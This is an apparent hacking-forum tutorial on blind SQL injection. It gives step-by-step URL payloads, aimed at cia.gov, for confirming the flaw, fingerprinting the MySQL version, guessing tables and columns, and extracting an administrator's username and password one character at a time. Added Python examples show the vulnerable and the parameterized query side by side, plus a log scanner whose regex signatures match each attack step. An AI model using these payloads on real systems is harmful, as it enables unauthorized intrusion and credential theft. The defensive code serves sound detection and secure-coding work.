{TUT}Blind SQL Injection{TUT}

To start, I will give credit for this tutorial to SqlDoctor:

Blind SQL injection:

If you don't know about MySQL injection, turn around and learn it before you even consider learning this, because this is a whole different story.

1. Test for vulnerability. So you have a site, let's say:
Code:
http://www.cia.gov/news.php?id=1
just like normal MySQL injection.

But for blind injection you put:
Code:
http://www.cia.gov/news.php?id=1 and 1=2
If you see any text from the page missing, or an error message like "invalid id", "db_error select * from xxxx@localhost", "call line /" or anything like that, then it's vulnerable.

This works because 1=2 is always false. You see, if it was:
Code:
http://www.cia.gov/index.php?id=1 and 1=1
then you would get the normal page, because 1=1 is always true.
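To show why the page reacts differently to 1=1 and 1=2, here is an added example (mine, not SqlDoctor's and not code from any real site) that builds a stand-in for news.php two ways: the vulnerable way, gluing the id straight into the SQL string, and the fixed way, validating the type and binding it as a parameter. The news table, its rows and the sqlite3 backend are constructed for the demonstration; the real application's schema is unknown.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the news table behind news.php."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(1, "First story"), (2, "Second story")])
    return con


def lookup_vulnerable(con, raw_id):
    """Builds the query by string concatenation, the pattern the tutorial's
    payloads rely on: whatever follows the number becomes part of the WHERE
    clause, so 'and 1=2' empties the result and a stray quote raises an error
    that a careless page would print (the 'db_error' case above)."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "db_error: " + str(exc)
    return row[0] if row else None


def lookup_safe(con, raw_id):
    """Validates the type first, then binds the value as a parameter, so the
    input can never change the structure of the statement."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return None  # reject junk instead of letting it reach the database
    row = con.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None


def compare(raw_id):
    """Returns (vulnerable result, safe result) for one id value."""
    con = make_db()
    return lookup_vulnerable(con, raw_id), lookup_safe(con, raw_id)


if __name__ == "__main__":
    for probe in ("1", "1 and 1=1", "1 and 1=2", "1'"):
        print(repr(probe), "->", compare(probe))
```

The point to notice is the pair of probes: the vulnerable lookup answers "First story" for 1=1 and nothing for 1=2, which is exactly the true/false oracle the tutorial reads, while the safe lookup gives the same answer (nothing) to both, so there is no difference left to infer anything from.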

2. MySQL version. To find the MySQL version you need to do this query:
Code:
http://www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4

If the page comes back true then the version is 4; if not, then try:
Code:
http://www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
If it comes back true then it's version 5.

3. Fuzzing tables and columns. To find the table name you need to guess it, so here is the query:
Code:
http://www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
I have guessed the table admin; if the page loads true then the table exists.
E.g. the table name is administrator and we try:
Code:
(SELECT 1 from users limit 0,1)=1
Then it will return with an error, a.k.a. false, but if we did:
Code:
(SELECT 1 from administrator limit 0,1)=1
Then it would not error, a.k.a. true.

Now for the column. So the table is administrator and we found that by fuzzing;
now we need the column name. We fuzz it by:
Code:
http://www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
If the column password exists then it won't error. You get my drift...

4. Extracting the password with ASCII. So now we have the table/column we need to extract. Well, as you know, it won't just pop up on the screen; we will need to use the ASCII char:
Code:
http://www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
If this returns true then you need to go higher:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>103
If this errors then it's not greater than 103 but is greater than 99.
Now try:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>100
No error, so it's greater than 99 and not greater than 103. Higher:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>101
Error, so it's greater than 99 but not greater than 101. Higher:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>100
Error, so it's greater than 99 but not greater than 100, making it 100. The first character of the password is 100, which, if you put it into an ASCII converter, you will see is the letter d. Now you need to find the next character:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),2,1))>60
Notice how I did where userid=2),2,1))>60 instead of 1,1, so this will be doing the second character. Keep extracting characters until you get an error, and then you will have the hash / password.
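Every step of this tutorial leaves a very recognisable trail in the web server's access log: an "and 1=2" probe, a "substring(@@version" probe, "(SELECT 1 from ... limit" table guesses, and then a long run of "ascii(substring(" requests from one address whose responses alternate between exactly two page sizes. The following is an added example from me, not part of SqlDoctor's tutorial, of a small log scanner for that trail. The log lines are constructed (Apache/nginx combined-log style is assumed), and the signature names and the two-size oracle heuristic are my own choices rather than any product's rules.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log sample: one address walking through the tutorial's
# steps, plus one ordinary visitor. Sizes 5120/2048 stand for the normal
# page and the "text missing" page.
LOG_LINES = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=1%20and%201=2 HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /news.php?id=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /news.php?id=1%20and%20(SELECT%201%20from%20admin%20limit%200,1)=1 HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /news.php?id=1%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20administrator%20where%20userid=2),1,1))>99 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:56:23 +0000] "GET /news.php?id=1%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20administrator%20where%20userid=2),1,1))>103 HTTP/1.1" 200 2048
198.51.100.9 - - [10/Oct/2023:13:57:02 +0000] "GET /news.php?id=2 HTTP/1.1" 200 4870
"""

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# One regex per step of the tutorial, applied to the decoded, lowercased query.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),          # and 1=2 / 1=1
    "version_probe": re.compile(r"substring\s*\(\s*@@version"),      # step 2
    "table_probe": re.compile(r"\(\s*select\s+1\s+from\s+\w+\s+limit"),  # step 3
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\("),   # step 4
}


def scan(log_text):
    """Returns {ip: {"hits": Counter(signature -> count), "sizes": set}} for
    every address whose requests matched at least one signature."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        query = unquote_plus(urlsplit(m["path"]).query).lower()
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if not hits:
            continue
        entry = report.setdefault(m["ip"], {"hits": Counter(), "sizes": set()})
        entry["hits"].update(hits)
        entry["sizes"].add(int(m["size"]))
    return report


def summarize(log_text):
    """One tuple per flagged source: (ip, total probe count, two_sized_oracle).
    Responses alternating between exactly two sizes are what a working
    true/false oracle looks like from the server side."""
    out = []
    for ip, entry in scan(log_text).items():
        out.append((ip, sum(entry["hits"].values()), len(entry["sizes"]) == 2))
    return sorted(out)


if __name__ == "__main__":
    for ip, entry in scan(LOG_LINES).items():
        print(ip, dict(entry["hits"]), sorted(entry["sizes"]))
    print(summarize(LOG_LINES))
```

In practice you would feed real log lines into scan() instead of LOG_LINES and alert on any source with a char_extraction count above a small threshold, since one probe per character per guess means dozens of hits for even a short hash; the two-size check is a cheap second signal that separates a real oracle from random scanner noise.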

SAY THANKS TO KEEP THIS THREAD ALIVE!
If this tutorial helped you in one way, leave your feedback!

This is my first thread here on HackForums; since I am a new member here, I hope it helped you!
